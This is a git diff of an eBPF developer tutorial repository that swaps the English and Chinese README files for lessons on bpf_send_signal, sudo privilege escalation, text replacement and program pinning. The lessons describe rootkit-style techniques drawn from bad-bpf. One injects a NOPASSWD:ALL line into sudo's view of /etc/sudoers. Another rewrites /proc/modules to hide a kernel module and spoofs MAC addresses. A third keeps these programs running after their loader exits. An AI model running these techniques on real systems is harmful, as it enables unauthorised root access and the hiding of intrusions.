eBPF 程序与用户态程序相结合,实现对系统调用的监控和干预。eBPF 提供了一种在内核空间执行程序的机制,这种技术不仅限于监控,还可用于性能优化、安全防御、系统诊断等多种场景。对于开发者来说,这为Linux系统的性能调优和故障排查提供了一种强大且灵活的工具。 + +最后,如果您对 eBPF 技术感兴趣,并希望进一步了解和实践,可以访问我们的教程代码仓库 和教程网站 + +## 参考资料 + +- +- diff --git a/src/25-signal/README_en.md b/src/25-signal/README_en.md deleted file mode 100644 index 3160ac3..0000000 --- a/src/25-signal/README_en.md +++ /dev/null @@ -1,200 +0,0 @@ -# Using bpf_send_signal to Terminate Malicious Processes in eBPF - -eBPF (Extended Berkeley Packet Filter) is a revolutionary technology in the Linux kernel that allows users to execute custom programs in kernel space without modifying the kernel source code or loading any kernel modules. This provides developers with great flexibility to observe, modify, and control the Linux system. - -This article introduces how to use the `bpf_send_signal` feature of eBPF to intervene by sending signals to specified processes. For more tutorial documentation and complete source code, please refer to . - -## Use Cases - -**1. Performance Issues:** - -Optimizing the performance of applications is a core task for developers and system administrators in the modern software ecosystem. When applications, such as hhvm, run slowly or have abnormally high resource utilization, they can adversely affect the entire system. Therefore, pinpointing these performance bottlenecks and resolving them promptly is crucial. - -**2. Anomaly Detection and Response:** - -Any system running in a production environment may face various anomalies, from simple resource leaks to complex malware attacks. In these situations, the system needs to detect these anomalies quickly and accurately and take appropriate countermeasures. - -**3. Dynamic System Management:** - -With the rise of cloud computing and microservice architectures, dynamically adjusting resource configurations and application behaviors based on the current system state has become a key requirement. For example, auto-scaling based on traffic fluctuations or reducing CPU frequency when detecting system overheating. - -### Limitations of Existing Solutions - -To meet the needs of the above use cases, traditional technical methods are as follows: - -- Install a bpf program that continuously monitors the system while polling a map. -- When an event triggers specific conditions defined in the bpf program, it writes related data to this map. -- Then, external analysis tools read data from this map and send signals to the target process based on the retrieved information. - -Although this method is feasible in many scenarios, it has a major flaw: the time delay from when the event occurs to when the external tool responds can be relatively large. This delay can affect the speed of event response, making performance analysis results inaccurate or failing to respond promptly to malicious activity. - -### Advantages of the New Solution - -To overcome the limitations of traditional methods, the Linux kernel offers the `bpf_send_signal` and `bpf_send_signal_thread` helper functions. - -The main advantages of these functions include: - -**1. Real-time Response:** - -By sending signals directly from kernel space, avoiding extra overhead in user space, signals can be sent immediately after an event occurs, significantly reducing latency. - -**2. Accuracy:** - -Thanks to reduced latency, we can now obtain a more accurate snapshot of the system state, especially important for performance analysis and anomaly detection. - -**3. Flexibility:** - -These new helper functions provide developers with more flexibility. They can customize the signal sending logic according to different use cases and needs, allowing for more precise control and management of system behavior. - -## Kernel Code Analysis - -In modern operating systems, a common security strategy is to monitor and control interactions between processes. Especially in Linux systems, the `ptrace` system call is a powerful tool that allows one process to observe and control the execution of another process, modifying its registers and memory. This makes it the primary mechanism for debugging and tracing tools like `strace` and `gdb`. However, malicious use of `ptrace` can also pose security risks. - -The goal of this program is to monitor `ptrace` calls in kernel mode. When specific conditions are met, it sends a `SIGKILL` signal to terminate the calling process. Additionally, for debugging or auditing purposes, the program logs this intervention and sends related information to user space. - -## Code Analysis - -### 1. Data Structure Definition (`signal.h`) - -signal.h - -```c -// Simple message structure to get events from eBPF Programs -// in the kernel to user space -#define TASK_COMM_LEN 16 -struct event { - int pid; - char comm[TASK_COMM_LEN]; - bool success; -}; -``` - -This section defines a simple message structure used to pass events from eBPF programs in the kernel to user space. The structure includes the process ID, command name, and a boolean value indicating whether the signal was successfully sent. - -### 2. eBPF Program (`signal.bpf.c`) - -signal.bpf.c - -```c -// SPDX-License-Identifier: BSD-3-Clause -#include "vmlinux.h" -#include -#include -#include -#include "common.h" - -char LICENSE[] SEC("license") = "Dual BSD/GPL"; - -// Ringbuffer Map to pass messages from kernel to user -struct { - __uint(type, BPF_MAP_TYPE_RINGBUF); - __uint(max_entries, 256 * 1024); -} rb SEC(".maps"); - -// Optional Target Parent PID -const volatile int target_ppid = 0; - -SEC("tp/syscalls/sys_enter_ptrace") -int bpf_dos(struct trace_event_raw_sys_enter *ctx) -{ - long ret = 0; - size_t pid_tgid = bpf_get_current_pid_tgid(); - int pid = pid_tgid >> 32; - - // if target_ppid is 0 then we target all pids - if (target_ppid != 0) { - struct task_struct *task = (struct task_struct *)bpf_get_current_task(); - int ppid = BPF_CORE_READ(task, real_parent, tgid); - if (ppid != target_ppid) { - return 0; - } - } - - // Send signal. 9 == SIGKILL - ret = bpf_send_signal(9); - - // Log event - struct event *e; - e = bpf_ringbuf_reserve(&rb, sizeof(*e), 0); - if (e) { - e->success = (ret == 0); - e->pid = pid; - bpf_get_current_comm(&e->comm, sizeof(e->comm)); - bpf_ringbuf_submit(e, 0); - } - - return 0; -} -``` - -- **License Declaration** - - The program's license is declared as "Dual BSD/GPL". This is to meet the Linux kernel's licensing requirements for eBPF programs. - -- **Ringbuffer Map** - - This is a ring buffer type map that allows messages generated by the eBPF program in kernel space to be efficiently read by user space programs. - -- **Target Parent Process ID** - - `target_ppid` is an optional parent process ID used to limit which processes are affected. If set to a non-zero value, only processes that match it will be targeted. - -- **Main Function `bpf_dos`** - - - **Process Check** - The program first retrieves the current process's ID. If `target_ppid` is set, it also retrieves the current process's parent process ID and compares them. If they don't match, it returns immediately. - - - **Sending Signal** - It uses `bpf_send_signal(9)` to send a `SIGKILL` signal. This terminates the process calling `ptrace`. - - - **Logging the Event** - The event is logged using the ring buffer map. This includes whether the signal was successfully sent, the process ID, and the process's command name. - -In summary, this eBPF program provides a method that allows system administrators or security teams to monitor and intervene `ptrace` calls at the kernel level, offering an additional layer against potential malicious activities or misoperations. - -## Compilation and Execution - -eunomia-bpf is an open-source eBPF dynamic loading runtime and development toolchain combined with Wasm. Its purpose is to simplify the development, building, distribution, and execution of eBPF programs. You can refer to to download and install the `ecc` compiler toolchain and `ecli` runtime. We use eunomia-bpf to compile and run this example. - -Compilation: - -```bash -./ecc signal.bpf.c signal.h -``` - -Usage: - -```console -$ sudo ./ecli package.json -TIME PID COMM SUCCESS -``` - -This program will send a `SIG_KILL` signal to any program attempting to use the `ptrace` system call, such as `strace`. Once the eBPF program starts running, you can test it by running the following command: - -```bash -$ strace /bin/whoami -Killed -``` - -The original console will output: - -```txt -INFO [bpf_loader_lib::skeleton] Running ebpf program... -TIME PID COMM SUCCESS -13:54:45 8857 strace true -``` - -The complete source code can be found at: - -## Conclusion - -Through this example, we delved into how to combine eBPF programs with user-space programs to monitor and intervene in system calls. eBPF provides a mechanism for executing programs in kernel space. This technology is not limited to monitoring but can also be used for performance optimization, security defense, system diagnostics, and various other scenarios. For developers, it offers a powerful and flexible tool for performance tuning and troubleshooting in Linux systems. - -Lastly, if you are interested in eBPF technology and wish to further understand and practice, you can visit our tutorial code repository and tutorial website . - -## References - -- -- - -> The original link of this article: diff --git a/src/26-sudo/README.md b/src/26-sudo/README.md index a7cc072..7fe9a66 100644 --- a/src/26-sudo/README.md +++ b/src/26-sudo/README.md @@ -1,25 +1,23 @@ -# 使用 eBPF 添加 sudo 用户 +# Using eBPF to add sudo user -本文完整的源代码: +The full source code for this article can be found at -关于如何安装依赖,请参考: - -编译: +Compilation: ```bash make ``` -使用方式: +Usage: ```sh sudo ./sudoadd --username lowpriv-user ``` -这个程序允许一个通常权限较低的用户使用 `sudo` 成为 root。 +This program allows a user with lower privileges to become root using `sudo`. -它通过拦截 `sudo` 读取 `/etc/sudoers` 文件,并将第一行覆盖为 ` ALL=(ALL:ALL) NOPASSWD:ALL #` 的方式工作。这欺骗了 sudo,使其认为用户被允许成为 root。其他程序如 `cat` 或 `sudoedit` 不受影响,所以对于这些程序来说,文件未改变,用户并没有这些权限。行尾的 `#` 确保行的其余部分被当作注释处理,因此不会破坏文件的逻辑。 +It works by intercepting `sudo` reading the `/etc/sudoers` file and overwriting the first line with ` ALL=(ALL:ALL) NOPASSWD:ALL #`. This tricks `sudo` into thinking that the user is allowed to become root. Other programs like `cat` or `sudoedit` are not affected, so the file remains unchanged and the user does not have these permissions. The `#` at the end of the line ensures that the rest of the line is treated as a comment, so it does not break the logic of the file. -## 参考资料 +## References -- +- [https://github.com/pathtofile/bad-bpf](https://github.com/pathtofile/bad-bpf) \ No newline at end of file diff --git a/src/26-sudo/README.zh.md b/src/26-sudo/README.zh.md new file mode 100644 index 0000000..a7cc072 --- /dev/null +++ b/src/26-sudo/README.zh.md @@ -0,0 +1,25 @@ +# 使用 eBPF 添加 sudo 用户 + +本文完整的源代码: + +关于如何安装依赖,请参考: + +编译: + +```bash +make +``` + +使用方式: + +```sh +sudo ./sudoadd --username lowpriv-user +``` + +这个程序允许一个通常权限较低的用户使用 `sudo` 成为 root。 + +它通过拦截 `sudo` 读取 `/etc/sudoers` 文件,并将第一行覆盖为 ` ALL=(ALL:ALL) NOPASSWD:ALL #` 的方式工作。这欺骗了 sudo,使其认为用户被允许成为 root。其他程序如 `cat` 或 `sudoedit` 不受影响,所以对于这些程序来说,文件未改变,用户并没有这些权限。行尾的 `#` 确保行的其余部分被当作注释处理,因此不会破坏文件的逻辑。 + +## 参考资料 + +- diff --git a/src/26-sudo/README_en.md b/src/26-sudo/README_en.md deleted file mode 100644 index 7fe9a66..0000000 --- a/src/26-sudo/README_en.md +++ /dev/null @@ -1,23 +0,0 @@ -# Using eBPF to add sudo user - -The full source code for this article can be found at - -Compilation: - -```bash -make -``` - -Usage: - -```sh -sudo ./sudoadd --username lowpriv-user -``` - -This program allows a user with lower privileges to become root using `sudo`. - -It works by intercepting `sudo` reading the `/etc/sudoers` file and overwriting the first line with ` ALL=(ALL:ALL) NOPASSWD:ALL #`. This tricks `sudo` into thinking that the user is allowed to become root. Other programs like `cat` or `sudoedit` are not affected, so the file remains unchanged and the user does not have these permissions. The `#` at the end of the line ensures that the rest of the line is treated as a comment, so it does not break the logic of the file. - -## References - -- [https://github.com/pathtofile/bad-bpf](https://github.com/pathtofile/bad-bpf) \ No newline at end of file diff --git a/src/27-replace/README.md b/src/27-replace/README.md index 9ab514c..516e840 100644 --- a/src/27-replace/README.md +++ b/src/27-replace/README.md @@ -1,40 +1,38 @@ -# 使用 eBPF 替换任意程序读取或写入的文本 +# Replace Text Read or Written by Any Program with eBPF -完整源代码: +See for the full source code. -关于如何安装依赖,请参考: - -编译: +Compile: ```bash make ``` -使用方式: +Usage: ```sh sudo ./replace --filename /path/to/file --input foo --replace bar ``` -这个程序将文件中所有与 `input` 匹配的文本替换为 `replace` 文本。 -这有很多用途,例如: +This program will replace all text in the file that matches 'input' with 'replace' text. +There are many use cases for this, such as: -隐藏内核模块 `joydev`,避免被如 `lsmod` 这样的工具发现: +Hiding the kernel module 'joydev' to avoid detection by tools like 'lsmod': ```bash ./replace -f /proc/modules -i 'joydev' -r 'cryptd' ``` -伪造 `eth0` 接口的 MAC 地址: +Spoofing the MAC address of the 'eth0' interface: ```bash ./replace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00' ``` -恶意软件进行反沙箱检查可能会检查 MAC 地址,寻找是否正在虚拟机或沙箱内运行,而不是在“真实”的机器上运行的迹象。 +Malware performing anti-sandbox checks may look for MAC addresses as an indication of whether it is running in a virtual machine or sandbox, rather than on a "real" machine. -**注意:** `input` 和 `replace` 的长度必须相同,以避免在文本块的中间添加 NULL 字符。在 bash 提示符下输入换行符,使用 `$'\n'`,例如 `--replace $'text\n'`。 +**Note:** The lengths of 'input' and 'replace' must be the same to avoid introducing NULL characters in the middle of the text block. To input a newline character at a bash prompt, use `$'\n'`, for example `--replace $'text\n'`. -## 参考资料 +## References -- +- . \ No newline at end of file diff --git a/src/27-replace/README.zh.md b/src/27-replace/README.zh.md new file mode 100644 index 0000000..9ab514c --- /dev/null +++ b/src/27-replace/README.zh.md @@ -0,0 +1,40 @@ +# 使用 eBPF 替换任意程序读取或写入的文本 + +完整源代码: + +关于如何安装依赖,请参考: + +编译: + +```bash +make +``` + +使用方式: + +```sh +sudo ./replace --filename /path/to/file --input foo --replace bar +``` + +这个程序将文件中所有与 `input` 匹配的文本替换为 `replace` 文本。 +这有很多用途,例如: + +隐藏内核模块 `joydev`,避免被如 `lsmod` 这样的工具发现: + +```bash +./replace -f /proc/modules -i 'joydev' -r 'cryptd' +``` + +伪造 `eth0` 接口的 MAC 地址: + +```bash +./replace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00' +``` + +恶意软件进行反沙箱检查可能会检查 MAC 地址,寻找是否正在虚拟机或沙箱内运行,而不是在“真实”的机器上运行的迹象。 + +**注意:** `input` 和 `replace` 的长度必须相同,以避免在文本块的中间添加 NULL 字符。在 bash 提示符下输入换行符,使用 `$'\n'`,例如 `--replace $'text\n'`。 + +## 参考资料 + +- diff --git a/src/27-replace/README_en.md b/src/27-replace/README_en.md deleted file mode 100644 index 516e840..0000000 --- a/src/27-replace/README_en.md +++ /dev/null @@ -1,38 +0,0 @@ -# Replace Text Read or Written by Any Program with eBPF - -See for the full source code. - -Compile: - -```bash -make -``` - -Usage: - -```sh -sudo ./replace --filename /path/to/file --input foo --replace bar -``` - -This program will replace all text in the file that matches 'input' with 'replace' text. -There are many use cases for this, such as: - -Hiding the kernel module 'joydev' to avoid detection by tools like 'lsmod': - -```bash -./replace -f /proc/modules -i 'joydev' -r 'cryptd' -``` - -Spoofing the MAC address of the 'eth0' interface: - -```bash -./replace -f /sys/class/net/eth0/address -i '00:15:5d:01:ca:05' -r '00:00:00:00:00:00' -``` - -Malware performing anti-sandbox checks may look for MAC addresses as an indication of whether it is running in a virtual machine or sandbox, rather than on a "real" machine. - -**Note:** The lengths of 'input' and 'replace' must be the same to avoid introducing NULL characters in the middle of the text block. To input a newline character at a bash prompt, use `$'\n'`, for example `--replace $'text\n'`. - -## References - -- . \ No newline at end of file diff --git a/src/28-detach/README.md b/src/28-detach/README.md index a3c2157..645f798 100644 --- a/src/28-detach/README.md +++ b/src/28-detach/README.md @@ -1,46 +1,51 @@ -# 在应用程序退出后运行 eBPF 程序:eBPF 程序的生命周期 +# Running eBPF After Application Exits: The Lifecycle of eBPF Programs -eBPF(Extended Berkeley Packet Filter)是 Linux 内核中的一项重大技术创新,允许用户在内核空间中执行自定义程序,而无需修改内核源代码或加载任何内核模块。这为开发人员提供了极大的灵活性,可以观察、修改和控制 Linux 系统。 +eBPF (Extended Berkeley Packet Filter) is a revolutionary technology in the Linux kernel that allows users to execute custom programs in kernel space without modifying the kernel source code or loading any kernel modules. This provides developers with great flexibility to observe, modify, and control the Linux system. -本文将介绍 eBPF 程序的生命周期,以及如何在用户空间应用程序退出后继续运行 eBPF 程序的方法,还将介绍如何使用 "pin" 在不同进程之间共享 eBPF 对象。本文是 eBPF 开发者教程的一部分,更多详细信息可以在 中找到。 +This article introduces the Lifecycle of eBPF Programs, how to run eBPF programs after user-space application exits, and how to use pin to share eBPF objects between processes. This article is part of the eBPF Developer Tutorial, more details can be found in and -通过使用 "detach" 方法来运行 eBPF 程序,用户空间加载程序可以在不停止 eBPF 程序的情况下退出。另外,使用 "pin" 的方法可以在进程之间共享 eBPF 对象,使其保持活动状态。 +By using the detach method to run eBPF programs, the user space loader can exit without stopping the eBPF program. Another common use case for pinning is sharing eBPF objects between processes. For example, one could create a Map from Go, pin it, and inspect it using `bpftool map dump pinned /sys/fs/bpf/my_map`. -## eBPF 程序的生命周期 +## The Lifecycle of eBPF Programs -BPF对象(包括程序、映射和调试信息)通过文件描述符(FD)进行访问,并具有引用计数器。每个对象都有一个引用计数器,用于追踪对象被引用的次数。例如,当创建一个映射时,内核会分配一个struct bpf_map对象,并将其引用计数器初始化为1。然后,将映射的文件描述符返回给用户空间进程。如果进程退出或崩溃,文件描述符将被关闭,并且映射的引用计数将减少。当引用计数为零时,内存将被释放。 +File descriptors and reference counters are used to manage BPF objects (progs, maps, and debug info). When a map is created, the kernel initializes its reference counter to 1 and returns a file descriptor to the user space process. If the process exits or crashes, the file descriptor is closed and the reference counter of the map is decremented. After the RCU grace period, the map is freed from memory. -BPF程序使用 maps 有两个阶段。首先,创建 maps 并将其文件描述符存储为BPF_LD_IMM64指令的一部分。当内核验证程序时,它会增加程序使用的 maps 的引用计数,并将程序的引用计数初始化为1。此时,用户空间可以关闭与maps 相关的文件描述符,但 maps 不会被销毁,因为程序仍然在使用它们。当程序文件描述符关闭且引用计数为零时,销毁逻辑将减少 maps 的引用计数。这允许多个不同类型的程序同时使用同一个 maps。 +BPF programs that use BPF maps are loaded in two phases. The maps are created and their file descriptors are stored in the program's 'imm' field. The kernel increments the reference counters of the maps used by the program and initializes the program's reference counter to 1. Even if the user space process closes the file descriptors associated with the maps, the maps will not disappear because the program is still "using" them. When the file descriptor of the program is closed and its reference counter reaches zero, the destruction logic decrements the reference counters of all maps used by the program. This allows the same map to be used by multiple programs at once. -当程序附加到一个挂钩时,程序的引用计数增加。用户空间进程创建 maps 和程序,然后加载程序并将其附加到挂钩上后,就可以退出了。此时,由用户空间创建的 maps 和程序将保持活动状态,因为引用计数>0。这就是BPF对象的生命周期。只要BPF对象的引用计数>0,内核将保持其活动状态。 +When a program is attached to a hook, its reference counter is incremented. The user space process that created the maps and program can then exit, and the maps and program will remain alive as long as their reference counters are greater than zero. This is the lifecycle of a BPF object. -然而,不同的附加点的行为不同。一些附加点(如XDP、tc的clsact和基于cgroup的hooks)是全局的,即使没有进程使用它们,程序也会继续处理数据包。另一些附加点(如kprobe、uprobe、tracepoint、perf_event、raw_tracepoint、socket过滤器和so_reuseport挂钩)只在持有事件的进程的生命周期内生效。当这些进程崩溃时,内核将分离BPF程序并减少其引用计数。 +Not all attachment points are the same. XDP, tc's clsact, and cgroup-based hooks are global, meaning that programs will stay attached to them as long as the corresponding objects are alive. On the other hand, programs attached to kprobe, uprobe, tracepoint, perf_event, raw_tracepoint, socket filters, and so_reuseport hooks are local to the process. If the process crashes or closes the file descriptors associated with these hooks, the kernel will detach the BPF program and decrement its reference counter. -总结:XDP、tc、lwt和cgroup挂钩是全局的,而kprobe、uprobe、tracepoint、perf_event、raw_tracepoint、socket过滤器和so_reuseport挂钩是本地于进程的。基于文件描述符的API具有自动清理的优点,因此如果用户空间进程出现问题,内核将自动清理所有对象。在网络方面,基于文件描述符的API可以防止程序无限制地运行。 +The file descriptor based interface provides auto-cleanup, meaning that if anything goes wrong with the user space process, the kernel will automatically clean up all BPF objects. This interface is useful for networking as well. The use of BPFFS (BPF File System) allows a process to pin a BPF program or map, which increments their reference counters and keeps them alive even if they are not attached or used by any program. This is useful when an admin wants to examine a map even when the associated program is not running. -另一种保持 BPF 程序和映射活动的方法是 BPFFS,即BPF文件系统。通过将程序或 maps 固定(pin)到BPFFS中的某个位置,可以增加其引用计数,并使其保持活动状态,即使没有附加到任何位置或任何程序使用固定的BPF程序和 maps 。 +Detach and replace are important aspects of the lifetime of a BPF program. The detach hook prevents the execution of a previously attached program from any future events, while the replace feature allows a program to be replaced in cgroup-based hooks. There is a window where the old and new programs can be executing on different CPUs, but the kernel guarantees that one of them will be processing events. Some BPF developers use a scheme where the new program is loaded with the same maps as the old program to ensure safe replacement. -了解BPF程序和 maps 的生命周期对于用户安全、可靠地使用BPF是非常重要的。文件描述符、引用计数器和 BPFFS 等机制有助于管理BPF对象的生命周期,确保它们的正确创建、附加、分离和替换。 +Overall, understanding the lifetime of BPF programs and maps is crucial for users to use BPF safely and without surprises. The use of file descriptors, reference counters, and BPFFS helps manage the lifecycle of BPF objects, ensuring their proper creation, attachment, detachment, and replacement. -### Kubernetes 中的 eBPF:通过远程过程调用(RPC)部署 eBPF 程序 +### eBPF in Kubernetes: Deploy eBPF Programs via Remote Procedure Call -在 Kubernetes 环境中,部署 eBPF 程序通常需要更高级别的系统权限。通常,这些应用程序需要至少 CAP_BPF 权限,根据程序类型的不同,可能还需要其他权限。在多租户的 Kubernetes 环境中,为每个容器或应用程序授予广泛的权限可能带来安全风险。 +In a Kubernetes environment, deploying eBPF programs often necessitates a higher level of system privileges. Typically, these applications require at least CAP_BPF permissions, and depending on the program type, they may need even more. This requirement poses a challenge in a multi-tenant Kubernetes environment where granting extensive privileges can be a security risk. -为了解决权限问题,一种方法是通过固定(pinning)eBPF 映射来减轻权限要求。固定允许 eBPF 对象在创建它们的进程的生命周期之外保持活动状态,以便其他进程可以访问它们。在 Kubernetes 中,不同的容器可能需要与相同的 eBPF 对象进行交互,因此固定对象很有用。 +#### Using Pin to Mitigate Privilege Requirements -例如,可以使用特权的初始化器容器来创建并固定一个 eBPF 映射。随后的容器(可能以较低权限运行)可以与固定的 eBPF 对象进行交互。这种方法将权限要求限制在初始化阶段,增强了整体安全性。 +One way to address the privilege issue is through the use of pinning eBPF maps. Pinning allows eBPF objects to persist beyond the life of the process that created them, making them accessible to other processes. This method can be particularly useful in Kubernetes, where different containers might need to interact with the same eBPF objects. -在这种背景下,bpfman 项目发挥了关键作用。bpfman,即 BPF Daemon,旨在以更受控且更安全的方式管理 eBPF 程序和映射的生命周期。它充当用户空间与内核空间之间的中间层,提供加载和管理 eBPF 程序的机制,而无需为每个单独的容器或应用程序授予广泛的权限。 +For example, an eBPF map can be created and pinned by a privileged initializer container. Subsequent containers, which may run with fewer privileges, can then interact with the pinned eBPF objects. This approach limits the need for elevated privileges to the initialization phase, thereby enhancing overall security. -在 Kubernetes 中,bpfman 可以作为特权服务部署,负责在集群的不同节点上加载和管理 eBPF 程序。它可以处理 eBPF 生命周期管理的复杂性,如加载、卸载、更新 eBPF 程序,并对其状态进行管理。这种集中化的方法简化了在 Kubernetes 集群中部署和管理 eBPF 程序的过程,同时符合安全最佳实践。 +#### The Role of bpfman in eBPF Lifecycle Management -## 使用 Detach 在应用程序退出后通过任何程序替换 eBPF +The bpfman project can play a crucial role in this context. bpfman, or BPF Daemon, is designed to manage the lifecycle of eBPF programs and maps in a more controlled and secure manner. It acts as a mediator between user space and kernel space, providing a mechanism to load and manage eBPF programs without granting extensive privileges to each individual container or application. -在 libbpf 中,可以使用 `bpf_object__pin_maps` 函数将映射固定到 BPF 对象中。对于程序和链接,也有类似的 API。 +In Kubernetes, bpfman could be deployed as a privileged service, responsible for loading and managing eBPF programs across different nodes in the cluster. It can handle the intricacies of eBPF lifecycle management, such as loading, unloading, updating eBPF programs, and managing their state. This centralized approach simplifies the deployment and management of eBPF programs in a Kubernetes cluster, while adhering to security best practices. -以下是一个示例,演示如何使用类似于前一节中的 textreplace 程序的字符串替换示例来展示 detach 方法。可以使用类似的代码将程序、映射和链接固定到 BPF 对象中: +## Use Detach to Replace by Any Program with eBPF After it Exits + +In libbpf, the `bpf_object__pin_maps` function can be used to pin the maps in the BPF object, the programs and links has similar API. + +Here we use similar programs as textreplace in the previous section to demonstrate the detach method, the pin eBPF code is like: ```c + int pin_program(struct bpf_program *prog, const char* path) { int err; @@ -75,43 +80,51 @@ int pin_link(struct bpf_link *link, const char* path) } ``` -## 运行示例 +## Running -在这个示例中,我们将继续使用前一节中的字符串替换示例来演示在应用程序退出后运行 eBPF 程序的方法,并展示潜在的安全风险。通过使用 `--detach` 参数运行该程序,可以使用户空间加载程序在不停止 eBPF 程序的情况下退出。完整的示例代码可以在 中找到。关于如何安装依赖,请参考: +Here, we still use the example of string replacement used in the previous application to demonstrate potential security risks. By using `--detach` to run the program, the user space loader can exit without stopping the eBPF program. -在运行之前,请确保已经挂载了 BPF 文件系统: +The code of This example can be found in + +Compilation: + +```bash +make +``` + +Before running, please make sure that the BPF file system has been mounted: ```bash sudo mount bpffs -t bpf /sys/fs/bpf mkdir /sys/fs/bpf/textreplace ``` -然后,可以使用以下命令运行带有 detach 参数的 text-replace2 程序: +Then, you can run text-replace2 with detach: ```bash ./textreplace2 -f /proc/modules -i 'joydev' -r 'cryptd' -d ``` -这将在 `/sys/fs/bpf/textreplace` 目录下创建一些 eBPF 链接文件。加载程序成功运行后,可以使用以下命令检查日志: +This will create some eBPF link files under `/sys/fs/bpf/textreplace`. Once the loader is successfully running, you can check the log by running the following command: ```bash sudo cat /sys/kernel/debug/tracing/trace_pipe -# 确认链接文件是否存在 +# Confirm that the link files exist sudo ls -l /sys/fs/bpf/textreplace ``` -最后,要停止程序,只需删除链接文件: +Finally, to stop, simply delete the link files: ```bash sudo rm -r /sys/fs/bpf/textreplace ``` -## 参考资料 +## References -您可以访问我们的教程代码仓库 或网站 以获取更多示例和完整的教程。 +You can visit our tutorial code repository [at https://github.com/eunomia-bpf/bpf-developer-tutorial](https://github.com/eunomia-bpf/bpf-developer-tutorial) or our website [at https://eunomia.dev/zh/tutorials/](https://eunomia.dev/zh/tutorials/) for more examples and a complete tutorial. -- [bad-bpf](https://github.com/pathtofile/bad-bpf) -- [Object Lifetime in the Linux kernel](https://facebookmicrosites.github.io/bpf/blog/2018/08/31/object-lifetime.html) -- [BPFMan: A Novel Way to Manage eBPF—Beyond Capsule Mode](https://bpfman.io/main/blog/2023/09/07/bpfman-a-novel-way-to-manage-ebpf) +- +- +- -> 原文地址: +> The original link of this article: diff --git a/src/28-detach/README.zh.md b/src/28-detach/README.zh.md new file mode 100644 index 0000000..a3c2157 --- /dev/null +++ b/src/28-detach/README.zh.md @@ -0,0 +1,117 @@ +# 在应用程序退出后运行 eBPF 程序:eBPF 程序的生命周期 + +eBPF(Extended Berkeley Packet Filter)是 Linux 内核中的一项重大技术创新,允许用户在内核空间中执行自定义程序,而无需修改内核源代码或加载任何内核模块。这为开发人员提供了极大的灵活性,可以观察、修改和控制 Linux 系统。 + +本文将介绍 eBPF 程序的生命周期,以及如何在用户空间应用程序退出后继续运行 eBPF 程序的方法,还将介绍如何使用 "pin" 在不同进程之间共享 eBPF 对象。本文是 eBPF 开发者教程的一部分,更多详细信息可以在 中找到。 + +通过使用 "detach" 方法来运行 eBPF 程序,用户空间加载程序可以在不停止 eBPF 程序的情况下退出。另外,使用 "pin" 的方法可以在进程之间共享 eBPF 对象,使其保持活动状态。 + +## eBPF 程序的生命周期 + +BPF对象(包括程序、映射和调试信息)通过文件描述符(FD)进行访问,并具有引用计数器。每个对象都有一个引用计数器,用于追踪对象被引用的次数。例如,当创建一个映射时,内核会分配一个struct bpf_map对象,并将其引用计数器初始化为1。然后,将映射的文件描述符返回给用户空间进程。如果进程退出或崩溃,文件描述符将被关闭,并且映射的引用计数将减少。当引用计数为零时,内存将被释放。 + +BPF程序使用 maps 有两个阶段。首先,创建 maps 并将其文件描述符存储为BPF_LD_IMM64指令的一部分。当内核验证程序时,它会增加程序使用的 maps 的引用计数,并将程序的引用计数初始化为1。此时,用户空间可以关闭与maps 相关的文件描述符,但 maps 不会被销毁,因为程序仍然在使用它们。当程序文件描述符关闭且引用计数为零时,销毁逻辑将减少 maps 的引用计数。这允许多个不同类型的程序同时使用同一个 maps。 + +当程序附加到一个挂钩时,程序的引用计数增加。用户空间进程创建 maps 和程序,然后加载程序并将其附加到挂钩上后,就可以退出了。此时,由用户空间创建的 maps 和程序将保持活动状态,因为引用计数>0。这就是BPF对象的生命周期。只要BPF对象的引用计数>0,内核将保持其活动状态。 + +然而,不同的附加点的行为不同。一些附加点(如XDP、tc的clsact和基于cgroup的hooks)是全局的,即使没有进程使用它们,程序也会继续处理数据包。另一些附加点(如kprobe、uprobe、tracepoint、perf_event、raw_tracepoint、socket过滤器和so_reuseport挂钩)只在持有事件的进程的生命周期内生效。当这些进程崩溃时,内核将分离BPF程序并减少其引用计数。 + +总结:XDP、tc、lwt和cgroup挂钩是全局的,而kprobe、uprobe、tracepoint、perf_event、raw_tracepoint、socket过滤器和so_reuseport挂钩是本地于进程的。基于文件描述符的API具有自动清理的优点,因此如果用户空间进程出现问题,内核将自动清理所有对象。在网络方面,基于文件描述符的API可以防止程序无限制地运行。 + +另一种保持 BPF 程序和映射活动的方法是 BPFFS,即BPF文件系统。通过将程序或 maps 固定(pin)到BPFFS中的某个位置,可以增加其引用计数,并使其保持活动状态,即使没有附加到任何位置或任何程序使用固定的BPF程序和 maps 。 + +了解BPF程序和 maps 的生命周期对于用户安全、可靠地使用BPF是非常重要的。文件描述符、引用计数器和 BPFFS 等机制有助于管理BPF对象的生命周期,确保它们的正确创建、附加、分离和替换。 + +### Kubernetes 中的 eBPF:通过远程过程调用(RPC)部署 eBPF 程序 + +在 Kubernetes 环境中,部署 eBPF 程序通常需要更高级别的系统权限。通常,这些应用程序需要至少 CAP_BPF 权限,根据程序类型的不同,可能还需要其他权限。在多租户的 Kubernetes 环境中,为每个容器或应用程序授予广泛的权限可能带来安全风险。 + +为了解决权限问题,一种方法是通过固定(pinning)eBPF 映射来减轻权限要求。固定允许 eBPF 对象在创建它们的进程的生命周期之外保持活动状态,以便其他进程可以访问它们。在 Kubernetes 中,不同的容器可能需要与相同的 eBPF 对象进行交互,因此固定对象很有用。 + +例如,可以使用特权的初始化器容器来创建并固定一个 eBPF 映射。随后的容器(可能以较低权限运行)可以与固定的 eBPF 对象进行交互。这种方法将权限要求限制在初始化阶段,增强了整体安全性。 + +在这种背景下,bpfman 项目发挥了关键作用。bpfman,即 BPF Daemon,旨在以更受控且更安全的方式管理 eBPF 程序和映射的生命周期。它充当用户空间与内核空间之间的中间层,提供加载和管理 eBPF 程序的机制,而无需为每个单独的容器或应用程序授予广泛的权限。 + +在 Kubernetes 中,bpfman 可以作为特权服务部署,负责在集群的不同节点上加载和管理 eBPF 程序。它可以处理 eBPF 生命周期管理的复杂性,如加载、卸载、更新 eBPF 程序,并对其状态进行管理。这种集中化的方法简化了在 Kubernetes 集群中部署和管理 eBPF 程序的过程,同时符合安全最佳实践。 + +## 使用 Detach 在应用程序退出后通过任何程序替换 eBPF + +在 libbpf 中,可以使用 `bpf_object__pin_maps` 函数将映射固定到 BPF 对象中。对于程序和链接,也有类似的 API。 + +以下是一个示例,演示如何使用类似于前一节中的 textreplace 